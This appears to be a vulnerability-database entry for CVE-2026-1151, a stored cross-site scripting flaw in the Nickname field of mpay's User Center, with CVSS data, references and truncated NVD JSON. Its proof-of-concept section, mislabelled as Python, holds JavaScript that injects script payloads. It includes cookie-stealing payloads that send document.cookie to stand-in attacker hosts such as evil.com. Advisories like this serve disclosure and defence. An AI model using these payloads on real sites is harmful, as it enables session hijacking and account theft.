CVE-2026-1151

Description

A weakness has been identified in technical-laohu mpay up to 1.2.4. The affected element is an unknown function of the component User Center. This manipulation of the argument Nickname causes cross site scripting. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks.

CVSS Details

CVSS Score

2.4

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:technical-laohu:mpay:*:*:*:*:*:*:*:* - VULNERABLE

technical-laohu mpay <= 1.2.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-1151 PoC - technical-laohu mpay Nickname XSS // This PoC demonstrates the stored XSS vulnerability in the User Center nickname field // Malicious payload to be injected into the Nickname field const xssPayload = '<script>alert("XSS Triggered - CVE-2026-1151")</script>'; // Attack scenario 1: Direct API submission async function exploitViaAPI() { const targetURL = 'https://target-server/api/user/profile'; const exploitData = { username: 'attacker_account', nickname: xssPayload, // Malicious XSS payload in nickname field email: '[email protected]', action: 'update_profile' }; try { const response = await fetch(targetURL, { method: 'POST', headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer <legitimate_token>' }, body: JSON.stringify(exploitData) }); console.log('Profile updated with XSS payload'); console.log('Payload stored successfully'); } catch (error) { console.error('Exploitation failed:', error); } } // Attack scenario 2: Cookie stealing payload const cookieStealPayload = '<script>fetch("https://attacker-server/steal?c="+document.cookie)</script>'; // Attack scenario 3: Session hijacking payload const sessionHijackPayload = '<img src=x onerror="fetch(\'https://evil.com/log?cookie=\'+document.cookie)">' // Trigger verification function verifyVulnerability() { // When victim visits profile page, XSS will execute console.log('XSS Payload:', xssPayload); console.log('Cookie Steal Payload:', cookieStealPayload); console.log('Exploit ready for use against mpay <= 1.2.4'); } exploitViaAPI(); verifyVulnerability();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1151
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1151
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1151/
[4] VulDB https://vuldb.com/cve/CVE-2026-1151
[5] https://github.com/bdkuzma/vuln/issues/16
[6] https://vuldb.com/?ctiid.341744
[7] https://vuldb.com/?id.341744
[8] https://vuldb.com/?submit.735773

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1151", "sourceIdentifier": "[email protected]", "published": "2026-01-19T11:15:50.047", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in technical-laohu mpay up to 1.2.4. The affected element is an unknown function of the component User Center. This manipulation of the argument Nickname causes cross site scripting. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks."}, {"lang": "es", "value": "Se ha identificado una debilidad en technical-laohu mpay hasta la versión 1.2.4. El elemento afectado es una función desconocida del componente Centro de Usuarios. Esta manipulación del argumento Nickname causa cross site scripting. El ataque puede ser iniciado remotamente. El exploit ha sido puesto a disposición del público y podría ser utilizado para ataques."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:N", "baseScore": 3.3, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 6.4, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:technical-laohu:mpay:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.2.4", "matchCriteriaId": "C5DCECBB-D75E-42B4-89F2-76CA77FD1A51"}]}]}], "references": [{"url": "https://github.com/bdkuzma/vuln/issues/16", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.341744", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341744", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.735773", "source": "[email protected]", "tags": ["Thi ... (truncated)